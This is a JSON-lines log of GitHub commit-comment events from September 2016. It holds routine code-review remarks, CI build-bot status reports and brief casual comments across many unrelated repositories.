{"id":"4543424888","type":"CommitCommentEvent","actor":{"login":"QuarkTheAwesome"},"repo":{"name":"QuarkTheAwesome/ProgrammingOnTheU"},"payload":{"comment":{"id":18972433,"position":null,"line":null,"path":null,"commit_id":"398fe5c345ca11e513573a624793c36ce8bad66f","created_at":"2016-09-10T04:15:09Z","updated_at":"2016-09-10T04:15:09Z","body":"It's more convenient for me to have the tutorial in a proper git \nrepository just because of my workflow. People can still pull request \nthe Markdown files as if it were code.\n\nI reckon this is better than the wiki system anyway since I have a level \nof control over what gets into the tutorial; compared to the wiki system \nwhich is either contributors-only or public edits; neither of which I'm \nparticularly fond for.\n\n\nOn 9/09/2016 9:46 PM, CreeperMario Games wrote:\n>\n> My thought: Leave code examples in the code repository, but move the \n> tutorial chapters into the wiki, so that others can edit it as well \n> (to a certain extent).\n>\n> Just a thought... ;)\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub \n> <https://github.com/QuarkTheAwesome/ProgrammingOnTheU/commit/398fe5c345ca11e513573a624793c36ce8bad66f#commitcomment-18961297>, \n> or mute the thread \n> <https://github.com/notifications/unsubscribe-auth/AII1QSIbiGnVg4UnTFhIav7g3QBEOyaRks5qoUcPgaJpZM4J491f>.\n>\n\n"}},"created_at":"2016-09-10T04:15:09Z"}
{"id":"4543427586","type":"CommitCommentEvent","actor":{"login":"rs21690"},"repo":{"name":"rs21690/GameMaker-Files"},"payload":{"comment":{"id":18972435,"position":null,"line":null,"path":null,"commit_id":"b0324e9c948584c6bb06c83a21a83178e671e72b","created_at":"2016-09-10T04:17:32Z","updated_at":"2016-09-10T04:17:32Z","body":"seems relatable"}},"created_at":"2016-09-10T04:17:32Z"}
{"id":"4543427683","type":"CommitCommentEvent","actor":{"login":"liupenggit"},"repo":{"name":"liupenggit/chefu"},"payload":{"comment":{"id":18972436,"position":null,"line":null,"path":null,"commit_id":"4c6c28243e484af9e4bdb22dfdb080d931023f73","created_at":"2016-09-10T04:17:39Z","updated_at":"2016-09-10T04:17:39Z","body":"6565"}},"created_at":"2016-09-10T04:17:39Z"}
{"id":"4543428419","type":"CommitCommentEvent","actor":{"login":"liupenggit"},"repo":{"name":"liupenggit/chefu"},"payload":{"comment":{"id":18972437,"position":2,"line":12,"path":"gitDemo/src/main/java/com/chefu/git/gitDemo/App.java","commit_id":"4c6c28243e484af9e4bdb22dfdb080d931023f73","created_at":"2016-09-10T04:18:22Z","updated_at":"2016-09-10T04:18:22Z","body":"谔谔"}},"created_at":"2016-09-10T04:18:22Z"}
{"id":"4543429764","type":"CommitCommentEvent","actor":{"login":"tanhanliang"},"repo":{"name":"CUMSA/members"},"payload":{"comment":{"id":18972439,"position":null,"line":null,"path":null,"commit_id":"6ca8807a4390e9cf51e3130254704ecce857ea66","created_at":"2016-09-10T04:19:46Z","updated_at":"2016-09-10T04:19:46Z","body":"Forgot to remove \r\n ```        $this->call(AttendeesTableSeeder::class);\r\n        $this->call(AttendeesTableSeeder::class);```\r\n..."}},"created_at":"2016-09-10T04:19:46Z"}
{"id":"4543435350","type":"CommitCommentEvent","actor":{"login":"Crunchyroll1"},"repo":{"name":"neetVeritas/pye-module"},"payload":{"comment":{"id":18972445,"position":null,"line":null,"path":null,"commit_id":"0d64c4778e89a6519d6afd172827fa6c607e9ddf","created_at":"2016-09-10T04:25:03Z","updated_at":"2016-09-10T04:25:03Z","body":"how do u class stack? i heard u said it was possible on atlava"}},"created_at":"2016-09-10T04:25:03Z"}
{"id":"4543435439","type":"CommitCommentEvent","actor":{"login":"Bugs1415"},"repo":{"name":"casillaskhoren1/Streamable-Anime-List"},"payload":{"comment":{"id":18972446,"position":16,"line":41,"path":"README.md","commit_id":"80314906be021cbc1de6ea427ca0030e3d5d9912","created_at":"2016-09-10T04:25:06Z","updated_at":"2016-09-10T04:25:06Z","body":"-Akikan!\r\n"}},"created_at":"2016-09-10T04:25:06Z"}
{"id":"4543443030","type":"CommitCommentEvent","actor":{"login":"devongovett"},"repo":{"name":"brawer/fonttest"},"payload":{"comment":{"id":18972454,"position":113,"line":602,"path":"reports/CoreText.html","commit_id":"2a895cc9dc77a8a4a0ac864996ae67db2aedf3f1","created_at":"2016-09-10T04:32:26Z","updated_at":"2016-09-10T04:32:26Z","body":"From my investigation into fails in my own implementation, it looks like this is actually caused by CoreText not properly implementing the `ROUND_XY_TO_GRID` flag for composite glyphs. CoreText's output can be reproduced in FreeType by commenting out [this if statement](http://git.savannah.gnu.org/cgit/freetype/freetype2.git/tree/src/truetype/ttgload.c#n1133). Perhaps that flag should be a separate test rather than part of the GPOS one?"}},"created_at":"2016-09-10T04:32:26Z"}
{"id":"4543450151","type":"CommitCommentEvent","actor":{"login":"yangyanglisjtu"},"repo":{"name":"yangyanglisjtu/cracking-the-coding-interview"},"payload":{"comment":{"id":18972468,"position":null,"line":null,"path":null,"commit_id":"7d798f1adee235109783834d80e4af36f15003b8","created_at":"2016-09-10T04:39:37Z","updated_at":"2016-09-10T04:39:37Z","body":"this"}},"created_at":"2016-09-10T04:39:37Z"}
{"id":"4543450232","type":"CommitCommentEvent","actor":{"login":"sant0ro"},"repo":{"name":"sant0ro/Yupi"},"payload":{"comment":{"id":18972469,"position":null,"line":null,"path":null,"commit_id":"89b52ebe1d6bcaf9afe0ea4cfe4162abf96ef71a","created_at":"2016-09-10T04:39:43Z","updated_at":"2016-09-10T04:39:43Z","body":"Amazing commit. First time i see the Bubbles in a List, and not fucking integers. Also First time Emulator with Documented ChatEmotions and Bubbles.\r\n\r\nGood job!"}},"created_at":"2016-09-10T04:39:43Z"}
{"id":"4543455501","type":"CommitCommentEvent","actor":{"login":"jiahan8"},"repo":{"name":"jiahan8/MyWebsite"},"payload":{"comment":{"id":18972487,"position":null,"line":null,"path":null,"commit_id":"99c4f93fbeca25385cfe6edca311c5c9742e63ce","created_at":"2016-09-10T04:44:59Z","updated_at":"2016-09-10T04:44:59Z","body":"other files"}},"created_at":"2016-09-10T04:44:59Z"}
{"id":"4543456589","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18972490,"position":null,"line":null,"path":null,"commit_id":"11c622443d7563d1dcd1c867263093809b94fa2a","created_at":"2016-09-10T04:45:59Z","updated_at":"2016-09-10T04:45:59Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1761 of 1762 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11c622443d7563d1dcd1c867263093809b94fa2a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11c622443d7563d1dcd1c867263093809b94fa2a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11c622443d7563d1dcd1c867263093809b94fa2a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.89%25-green.svg)</a>\n"}},"created_at":"2016-09-10T04:45:59Z"}
{"id":"4543456716","type":"CommitCommentEvent","actor":{"login":"crayzeewulf"},"repo":{"name":"mcsauder/libserial"},"payload":{"comment":{"id":18972492,"position":null,"line":null,"path":null,"commit_id":"c0dda111a0844910726cf0ba08fd51a7bd30bfd3","created_at":"2016-09-10T04:46:08Z","updated_at":"2016-09-10T04:46:08Z","body":"Mark: \r\n\r\nI am accepting this pull request but would like to revert a few changes afterwards if you agree with my comments below (all of which are minor issues):\r\n\r\n- You added `(void) argc` and `(void) argv` in `read_port.cpp` and `write_port.cpp` examples to quiet compiler warnings. However, I do not think this is needed in `write_port.cpp` as both `argv` and `argc` are used in that example and you should not get any compiler warnings about unused variables there. Please let me know if this is correct.\r\n- In `read_port.cpp` I would recommend simply removing the unused arguments from `main()`. In other words, simply replace `int main(int argc, char** argv)` with `int main()`. This is [valid C++](http://en.cppreference.com/w/cpp/language/main_function). \r\n- I've tried to use the following naming convention for naming variables in the library:\r\n  - Use `camelCase` with first letter in lower case for function and method parameters (except `argc` and `argv` as they are in widespread use).  For example, `baudRate` in `void SerialPort::SetBaudRate( const BaudRate baudRate )`.\r\n  - Use `mCamelCase` for class data members. For example, `SerialPort::mSerialPortImpl`.\r\n  - Use `underscore_separatation`  for all local variables. For example, see the local variable named `signal_dispatcher` in the definition of `SerialPort::SerialPortImpl::Open()` in `SerialPort.cpp`. \r\n\r\n  This helps easily differentiate between class data, function/method parameters and local variables. It also avoid conflicts between such variable names. Following this convention has helped me a lot in larger projects. Hence, in the examples `read_port.cpp` and `write_port.cpp`, the local variables ought to be named `serial_stream` and not `serialStream`.  If you agree and see the same benefit I see in following this convention, I would recommend updating the examples and unit tests accordingly in the long run (i.e. eventually). But I would not lose sleep over this. "}},"created_at":"2016-09-10T04:46:08Z"}
{"id":"4543460786","type":"CommitCommentEvent","actor":{"login":"marisolcabrera"},"repo":{"name":"marisolcabrera/marisol.github.io"},"payload":{"comment":{"id":18972499,"position":null,"line":null,"path":null,"commit_id":"d19194eb2f43dd6d37e85e29ba37386696d664cf","created_at":"2016-09-10T04:50:16Z","updated_at":"2016-09-10T04:50:16Z","body":"z"}},"created_at":"2016-09-10T04:50:16Z"}
{"id":"4543463932","type":"CommitCommentEvent","actor":{"login":"svetlyak40wt"},"repo":{"name":"AccelerationNet/a-cl-logger"},"payload":{"comment":{"id":18972503,"position":48,"line":275,"path":"README.md","commit_id":"ffc1e2e187567aa556c7bd7c8fc19dff2b56e30f","created_at":"2016-09-10T04:53:14Z","updated_at":"2016-09-10T04:53:14Z","body":"You forgot three backqotes for this snippet.\r\n\r\nThanks for an example.\r\n\r\nBy the way, what is really useful, is that you can indent data pushing like that:\r\n\r\n```\r\n(defun view (request)\r\n  (a-log:when-log-message-generated\r\n      ((a-log:push-into-message :param1 \"first\" :param2 \"second\"))\r\n    (testlog.info \"Processing request\" :request request)))\r\n\r\n\r\n(defun dispatch (request)\r\n  (a-log:when-log-message-generated\r\n      ((a-log:push-into-message :request-id 123))\r\n    (view request)))\r\n\r\n(dispatch \"some\")\r\n2016-09-10T07:48:02.721809+03:00      TESTLOG INFO    Processing request REQUEST-ID:123, PARAM1:first, PARAM2:second\r\n```\r\n\r\nBy the way, it will be useful, if logging like:\r\n```\r\n(testlog.debug \"Some message\" :param 1 :other 2)\r\n```\r\nalso add to the data."}},"created_at":"2016-09-10T04:53:14Z"}
{"id":"4543464641","type":"CommitCommentEvent","actor":{"login":"yakesiita"},"repo":{"name":"3dshax/ctr"},"payload":{"comment":{"id":18972508,"position":null,"line":null,"path":null,"commit_id":"bcb3734b9a26d0fe7ef66f7d3814406fee797303","created_at":"2016-09-10T04:53:59Z","updated_at":"2016-09-10T04:53:59Z","body":"I need help with mine i bought it and they didnt format the system and i dont have a pin my email is layaki_20@yahoo.com and the inquiry number is 1201452742 its the 3ds xl "}},"created_at":"2016-09-10T04:53:59Z"}
{"id":"4543465656","type":"CommitCommentEvent","actor":{"login":"yakesiita"},"repo":{"name":"3dshax/ctr"},"payload":{"comment":{"id":18972511,"position":null,"line":null,"path":null,"commit_id":"bcb3734b9a26d0fe7ef66f7d3814406fee797303","created_at":"2016-09-10T04:54:56Z","updated_at":"2016-09-10T04:54:56Z","body":"The date is fri 9/9"}},"created_at":"2016-09-10T04:54:56Z"}
{"id":"4543466660","type":"CommitCommentEvent","actor":{"login":"jspenc72"},"repo":{"name":"angular/angular-cli"},"payload":{"comment":{"id":18972514,"position":null,"line":null,"path":null,"commit_id":"e7ba9ce9bfe7c3d59bcb688f455ad9f4cd7b6021","created_at":"2016-09-10T04:55:53Z","updated_at":"2016-09-10T04:55:53Z","body":"Thank you!\r\n"}},"created_at":"2016-09-10T04:55:53Z"}
{"id":"4543471797","type":"CommitCommentEvent","actor":{"login":"theo4u"},"repo":{"name":"Robophil/Product-Tour"},"payload":{"comment":{"id":18972522,"position":23,"line":19,"path":"index.html","commit_id":"e831b089da8f0af817dcc8ccc87704b2ea83641c","created_at":"2016-09-10T05:00:42Z","updated_at":"2016-09-10T05:00:42Z","body":"i think using dist would have been better , so we can test distribution minified version on the go , as we do local testing "}},"created_at":"2016-09-10T05:00:42Z"}
{"id":"4543473960","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18972525,"position":null,"line":null,"path":null,"commit_id":"b7f607cacea4ead5721a032c42f68f0afada5112","created_at":"2016-09-10T05:02:49Z","updated_at":"2016-09-10T05:02:49Z","body":"os_2_0_develop_linux (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-b7f607cacea4ead5721a032c42f68f0afada5112-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-b7f607cacea4ead5721a032c42f68f0afada5112-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-10T05:02:49Z"}
{"id":"4543475503","type":"CommitCommentEvent","actor":{"login":"AlexCSilva"},"repo":{"name":"Zyk6870/OpenJK"},"payload":{"comment":{"id":18972527,"position":null,"line":null,"path":null,"commit_id":"b27564eccc0cf97ef8fc442ce9e228598fbf2331","created_at":"2016-09-10T05:04:00Z","updated_at":"2016-09-10T05:04:00Z","body":"awesome move :P"}},"created_at":"2016-09-10T05:04:00Z"}
{"id":"4543475691","type":"CommitCommentEvent","actor":{"login":"init-js"},"repo":{"name":"Anthchirp/git-notifier"},"payload":{"comment":{"id":18972528,"position":null,"line":null,"path":null,"commit_id":"ccef7687f3a97419225c33ce56b4fc659f8d6271","created_at":"2016-09-10T05:04:11Z","updated_at":"2016-09-10T05:04:11Z","body":"This seems to hold up completion of post-receive, and whatever else is waiting for post-receive to complete.\r\n\r\nIn my setup,  an interactive \"git push\" will hang until this timer expires. It's a long time!"}},"created_at":"2016-09-10T05:04:11Z"}
{"id":"4543476224","type":"CommitCommentEvent","actor":{"login":"bogas04"},"repo":{"name":"ManrajGrover/football-cli"},"payload":{"comment":{"id":18972529,"position":32,"line":46,"path":"helpers.js","commit_id":"8ec6d8661a3f93594bb5e2a8705f692fd2da4a1c","created_at":"2016-09-10T05:04:42Z","updated_at":"2016-09-10T05:04:42Z","body":"You can use ES6 destructuring for cleaner code.\r\n\r\n```javascript\r\nlet { \r\n  homeTeam\r\n  , awayTeam\r\n  , result : { goalsHomeTeam = \"-1\", goalsAwayTeam = \"-1\" }\r\n} = fixture;\r\n```"}},"created_at":"2016-09-10T05:04:42Z"}
{"id":"4543479659","type":"CommitCommentEvent","actor":{"login":"ManrajGrover"},"repo":{"name":"ManrajGrover/football-cli"},"payload":{"comment":{"id":18972533,"position":32,"line":46,"path":"helpers.js","commit_id":"8ec6d8661a3f93594bb5e2a8705f692fd2da4a1c","created_at":"2016-09-10T05:08:03Z","updated_at":"2016-09-10T05:08:03Z","body":"@bogas04 Yes, I know! :smile: But I want to support as minimum version of node as possible. And as per [node.green](http://node.green/), it isn't supported without harmony flag. Let me know if its wrong to do it. :smile: \r\n\r\nAlso, do you know of a way to specify and test for a version of node automatically?"}},"created_at":"2016-09-10T05:08:03Z"}
{"id":"4543480207","type":"CommitCommentEvent","actor":{"login":"18PatZ"},"repo":{"name":"HarkerGameDevelopmentClub/TheGame1617"},"payload":{"comment":{"id":18972534,"position":null,"line":null,"path":null,"commit_id":"95fcb52b9abd777e4217c31e0e3c647efda58574","created_at":"2016-09-10T05:08:40Z","updated_at":"2016-09-10T05:08:40Z","body":"What is this?"}},"created_at":"2016-09-10T05:08:40Z"}
{"id":"4543480529","type":"CommitCommentEvent","actor":{"login":"18PatZ"},"repo":{"name":"HarkerGameDevelopmentClub/TheGame1617"},"payload":{"comment":{"id":18972537,"position":null,"line":null,"path":null,"commit_id":"95fcb52b9abd777e4217c31e0e3c647efda58574","created_at":"2016-09-10T05:09:00Z","updated_at":"2016-09-10T05:09:00Z","body":"Use the Wiki tab..."}},"created_at":"2016-09-10T05:09:00Z"}
{"id":"4543483650","type":"CommitCommentEvent","actor":{"login":"bogas04"},"repo":{"name":"ManrajGrover/football-cli"},"payload":{"comment":{"id":18972539,"position":32,"line":46,"path":"helpers.js","commit_id":"8ec6d8661a3f93594bb5e2a8705f692fd2da4a1c","created_at":"2016-09-10T05:11:59Z","updated_at":"2016-09-10T05:11:59Z","body":"@ManrajGrover Oh that makes sense.\r\nYou can make your module available only for a particular version if [you want ](https://docs.npmjs.com/files/package.json#engines). Apart from that, doing the checks in code just looks ugly IMO. \r\n\r\nWhat you can do otherwise is to use babel and just fiddle with presets as and when old versions lose support. \r\n"}},"created_at":"2016-09-10T05:11:59Z"}
{"id":"4543485539","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18972542,"position":null,"line":null,"path":null,"commit_id":"843e0fea2549add6a7d1d6c752c5906691d601d6","created_at":"2016-09-10T05:13:51Z","updated_at":"2016-09-10T05:13:51Z","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/843e0fea2549add6a7d1d6c752c5906691d601d6#commitcomment-18972398) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/8b66f95fa742dc2fc965ded04cbed56f85bf865f/daily_2016_9_10/report.md). cc @jrevels"}},"created_at":"2016-09-10T05:13:51Z"}
{"id":"4543491365","type":"CommitCommentEvent","actor":{"login":"ManrajGrover"},"repo":{"name":"ManrajGrover/football-cli"},"payload":{"comment":{"id":18972557,"position":32,"line":46,"path":"helpers.js","commit_id":"8ec6d8661a3f93594bb5e2a8705f692fd2da4a1c","created_at":"2016-09-10T05:19:41Z","updated_at":"2016-09-10T05:19:41Z","body":"@bogas04 Yeps, I've done [that](https://github.com/ManrajGrover/football-cli/blob/master/package.json#L13).\r\n\r\nI was just wondering if one can test out the code for different versions and find the minimum version where code doesn't break. Using Babel looks like the only way to clean up the code for now."}},"created_at":"2016-09-10T05:19:41Z"}
{"id":"4543493253","type":"CommitCommentEvent","actor":{"login":"mcostalba"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":18972561,"position":null,"line":null,"path":null,"commit_id":"fe65ba628f2d6a84d469450cfd3265ef7b0b957b","created_at":"2016-09-10T05:21:37Z","updated_at":"2016-09-10T05:21:37Z","body":"@pb00068 current form of history is prone to be further reduced and simplified, there was also a patch few days ago to do this: https://github.com/official-stockfish/Stockfish/pull/779. As you can read in the PR, I have asked the author to still leave the code in a fluid/not crystalized state so to have explicit bonus formulas across the sources becuase I think this allows easier tuning/improvments.\r\n\r\nSo, if your patch proves stronger than current master I will be happy to apply, but we already know current code could be compacted and simplified even with a non-functional change patch, we just wait a strong patch to do so :-)\r\n\r\nSo please continue the test with same parameters of STC.\r\n"}},"created_at":"2016-09-10T05:21:37Z"}
{"id":"4543495993","type":"CommitCommentEvent","actor":{"login":"RJDTWO"},"repo":{"name":"GalaticStryder/kernel_lge_msm8974"},"payload":{"comment":{"id":18972571,"position":null,"line":null,"path":null,"commit_id":"c0df7ea82ea66c23433bf8ca04ceeba7781c5d03","created_at":"2016-09-10T05:24:23Z","updated_at":"2016-09-10T05:24:23Z","body":"@GalaticStryder Unfortunately, after several attempts, I never could get BFS to work. That said, thanks for your efforts and help. I just ran into constant bootloops. I plan to take a deeper look into this in the future. Thank you"}},"created_at":"2016-09-10T05:24:23Z"}
{"id":"4543498605","type":"CommitCommentEvent","actor":{"login":"corgiflash"},"repo":{"name":"corgiflash/aPrimerProject"},"payload":{"comment":{"id":18972576,"position":1,"line":1,"path":"README.md","commit_id":"8733e3b04d8500adac258a238f6a9d51bf9d7e2e","created_at":"2016-09-10T05:26:59Z","updated_at":"2016-09-10T05:26:59Z","body":",."}},"created_at":"2016-09-10T05:26:59Z"}
{"id":"4543499563","type":"CommitCommentEvent","actor":{"login":"takehiromouri"},"repo":{"name":"kaizokush/instapost"},"payload":{"comment":{"id":18972578,"position":8,"line":9,"path":"app/controllers/application_controller.rb","commit_id":"e607aad4ea7aee3dd1104ba2294cc683419975e6","created_at":"2016-09-10T05:27:59Z","updated_at":"2016-09-10T05:27:59Z","body":"this should be `posts_controller.rb`"}},"created_at":"2016-09-10T05:27:59Z"}
{"id":"4543499679","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18972579,"position":null,"line":null,"path":null,"commit_id":"7f8501cb80e16e7950a40a38d58464436fa1602e","created_at":"2016-09-10T05:28:07Z","updated_at":"2016-09-10T05:28:07Z","body":"buildingunit (Unknown) - Win64-Windows-7-VisualStudio-12: OK (2379 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7f8501cb80e16e7950a40a38d58464436fa1602e-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7f8501cb80e16e7950a40a38d58464436fa1602e-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-97.18%25-yellow.svg)</a> \n"}},"created_at":"2016-09-10T05:28:07Z"}
{"id":"4543506737","type":"CommitCommentEvent","actor":{"login":"dandv"},"repo":{"name":"influxdata/influxdb"},"payload":{"comment":{"id":18972610,"position":null,"line":null,"path":null,"commit_id":"26b0b4a104bf2b37b3bb55d7f6f947b189f9727c","created_at":"2016-09-10T05:34:59Z","updated_at":"2016-09-10T05:34:59Z","body":":+1:"}},"created_at":"2016-09-10T05:34:59Z"}
{"id":"4543506849","type":"CommitCommentEvent","actor":{"login":"abc612008"},"repo":{"name":"Infinideastudio/NEWorld"},"payload":{"comment":{"id":18972611,"position":18,"line":52,"path":"src/server/server.h","commit_id":"8de0766bfcbcab5862b4d32bdf245275169bc0aa","created_at":"2016-09-10T05:35:08Z","updated_at":"2016-09-10T05:35:08Z","body":"@Miigon 涉及server不涉及asio的部分呢？你得确定你要换的网络库效率>=asio然后我就不拦着你了"}},"created_at":"2016-09-10T05:35:08Z"}
{"id":"4543508338","type":"CommitCommentEvent","actor":{"login":"dandv"},"repo":{"name":"influxdata/influxdb"},"payload":{"comment":{"id":18972618,"position":5,"line":37,"path":"services/admin/assets/index.html","commit_id":"26b0b4a104bf2b37b3bb55d7f6f947b189f9727c","created_at":"2016-09-10T05:36:28Z","updated_at":"2016-09-10T05:36:28Z","body":":+1:, though I don't see this change live yet. I've installed as described at https://docs.influxdata.com/influxdb/v1.0/introduction/installation/#ubuntu-debian."}},"created_at":"2016-09-10T05:36:28Z"}
{"id":"4543508546","type":"CommitCommentEvent","actor":{"login":"SuslikV"},"repo":{"name":"jp9000/obs-studio"},"payload":{"comment":{"id":18972620,"position":null,"line":null,"path":null,"commit_id":"39592ff5ebb9aa641ae460b7c044e3fc1cc0196f","created_at":"2016-09-10T05:36:40Z","updated_at":"2016-09-10T05:36:40Z","body":"> it's annoying to have to remember to switch ...\r\nbecause you don't know what is online until you have a look at OBS Studio preview window.\r\n\r\nNews presenter on TV always know - what camera is active right now.\r\n\r\nAbout plugin itself, it has start and stop features, I don't mind, let it exist."}},"created_at":"2016-09-10T05:36:40Z"}
{"id":"4543509042","type":"CommitCommentEvent","actor":{"login":"crossjs"},"repo":{"name":"vuejs/vue"},"payload":{"comment":{"id":18972621,"position":22,"line":161,"path":"src/core/instance/render.js","commit_id":"100a2969aa5c64bd71758c79881cf4531e9907be","created_at":"2016-09-10T05:37:07Z","updated_at":"2016-09-10T05:37:07Z","body":"maybe presense is the misspell of presence?"}},"created_at":"2016-09-10T05:37:07Z"}
{"id":"4543509886","type":"CommitCommentEvent","actor":{"login":"mrbarbasa"},"repo":{"name":"SpaceToastCoastToCoast/Cash-Register"},"payload":{"comment":{"id":18972623,"position":23,"line":23,"path":"js/calculator.js","commit_id":"aa1c851e1e6c69c375aa04dda18d1baad0a845df","created_at":"2016-09-10T05:37:52Z","updated_at":"2016-09-10T05:37:52Z","body":"It is common practice that error handling occurs at the top of a function,.  In this way, you don't have to use an `else` clause (because once `throw` or `return` is reached, the function is exited prematurely), so we can rewrite this to:\r\n\r\n```\r\nif (typeof x !== 'number') {\r\n  throw new Error('Type mismatch');\r\n}\r\nthis._total += x;\r\n```"}},"created_at":"2016-09-10T05:37:52Z"}
{"id":"4543510707","type":"CommitCommentEvent","actor":{"login":"mrbarbasa"},"repo":{"name":"SpaceToastCoastToCoast/Cash-Register"},"payload":{"comment":{"id":18972624,"position":8,"line":8,"path":"js/calculator.js","commit_id":"aa1c851e1e6c69c375aa04dda18d1baad0a845df","created_at":"2016-09-10T05:38:38Z","updated_at":"2016-09-10T05:38:38Z","body":"This line should come after the error check, so after line 11."}},"created_at":"2016-09-10T05:38:38Z"}
{"id":"4543513896","type":"CommitCommentEvent","actor":{"login":"kolkl54"},"repo":{"name":"justjavac/free-programming-books-zh_CN"},"payload":{"comment":{"id":18972632,"position":9,"line":623,"path":"README.md","commit_id":"e35977eaf8ffff21c66f9531e0a6ea0df4a18b1a","created_at":"2016-09-10T05:41:48Z","updated_at":"2016-09-10T05:41:48Z","body":"My iPhone is lock"}},"created_at":"2016-09-10T05:41:48Z"}
{"id":"4543514089","type":"CommitCommentEvent","actor":{"login":"victorsv91"},"repo":{"name":"victorsv91/teste"},"payload":{"comment":{"id":18972633,"position":null,"line":null,"path":null,"commit_id":"2978af423995538eacdfa3780e62b7666b591e3b","created_at":"2016-09-10T05:41:59Z","updated_at":"2016-09-10T05:41:59Z","body":"posso por, por aqui?"}},"created_at":"2016-09-10T05:41:59Z"}
{"id":"4543514734","type":"CommitCommentEvent","actor":{"login":"victorsv91"},"repo":{"name":"victorsv91/teste"},"payload":{"comment":{"id":18972634,"position":4,"line":2,"path":"vai enviar.txt","commit_id":"2978af423995538eacdfa3780e62b7666b591e3b","created_at":"2016-09-10T05:42:33Z","updated_at":"2016-09-10T05:42:33Z","body":"alterar por aqui?"}},"created_at":"2016-09-10T05:42:33Z"}
{"id":"4543517521","type":"CommitCommentEvent","actor":{"login":"swainwri"},"repo":{"name":"swainwri/core-plot"},"payload":{"comment":{"id":18972637,"position":null,"line":null,"path":null,"commit_id":"d02fca21be537aab28f54dc26a32a2b707f6e2d9","created_at":"2016-09-10T05:45:21Z","updated_at":"2016-09-10T05:45:21Z","body":"Modified to include user interactivity to the CPTAxis title"}},"created_at":"2016-09-10T05:45:21Z"}
{"id":"4543518205","type":"CommitCommentEvent","actor":{"login":"victorsv91"},"repo":{"name":"victorsv91/teste"},"payload":{"comment":{"id":18972639,"position":4,"line":2,"path":"vai enviar.txt","commit_id":"2978af423995538eacdfa3780e62b7666b591e3b","created_at":"2016-09-10T05:45:57Z","updated_at":"2016-09-10T05:45:57Z","body":"sera..."}},"created_at":"2016-09-10T05:45:57Z"}
{"id":"4543519290","type":"CommitCommentEvent","actor":{"login":"wenfengshi"},"repo":{"name":"wenfengshi/wenfengshi.github.io"},"payload":{"comment":{"id":18972644,"position":2,"line":1,"path":".gitignore","commit_id":"c44ed3fb0f39acb1c867e1ad61328065d2560d05","created_at":"2016-09-10T05:46:55Z","updated_at":"2016-09-10T05:46:55Z","body":"hello "}},"created_at":"2016-09-10T05:46:55Z"}
{"id":"4543519955","type":"CommitCommentEvent","actor":{"login":"wenfengshi"},"repo":{"name":"wenfengshi/wenfengshi.github.io"},"payload":{"comment":{"id":18972645,"position":7,"line":6,"path":".gitignore","commit_id":"c44ed3fb0f39acb1c867e1ad61328065d2560d05","created_at":"2016-09-10T05:47:35Z","updated_at":"2016-09-10T05:47:35Z","body":"**nothing**\r\n"}},"created_at":"2016-09-10T05:47:35Z"}
{"id":"4543521064","type":"CommitCommentEvent","actor":{"login":"ElementalKiss"},"repo":{"name":"ElementalKiss/TIL"},"payload":{"comment":{"id":18972649,"position":null,"line":null,"path":null,"commit_id":"394657f627ae58dcdddfd1e09aeb64a195c9c877","created_at":"2016-09-10T05:48:43Z","updated_at":"2016-09-10T05:48:43Z","body":"OMG!!\n잘 돌아가는거 왜 바꿔? 의 20년 ㅋㅋㅋ\n\nSent from my iPhone\n\n2016. 9. 10. 오전 12:06 Not A Cat <notifications@github.com> 작성:\n\n> 하 CGI 그거 90년대에서 2000년대 초에나 쓰던거 아니냐 생각할텐데요.\n> \n> 믿기힘들겠지만,. 아직도 씨-지-아이를 사용하는 초고대의 서버가 인터넷 곳곳에 잠들어 있다고 하는 전설이 있답니다!\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n"}},"created_at":"2016-09-10T05:48:43Z"}
{"id":"4543522070","type":"CommitCommentEvent","actor":{"login":"akx"},"repo":{"name":"golddranks/bawwaw"},"payload":{"comment":{"id":18972653,"position":4,"line":4,"path":"README.md","commit_id":"abcdaed59fbefe61d0835006dc3c5d8adc862f84","created_at":"2016-09-10T05:49:43Z","updated_at":"2016-09-10T05:49:43Z","body":"SORRY NO IT HAS TO BE JAVA EE"}},"created_at":"2016-09-10T05:49:43Z"}
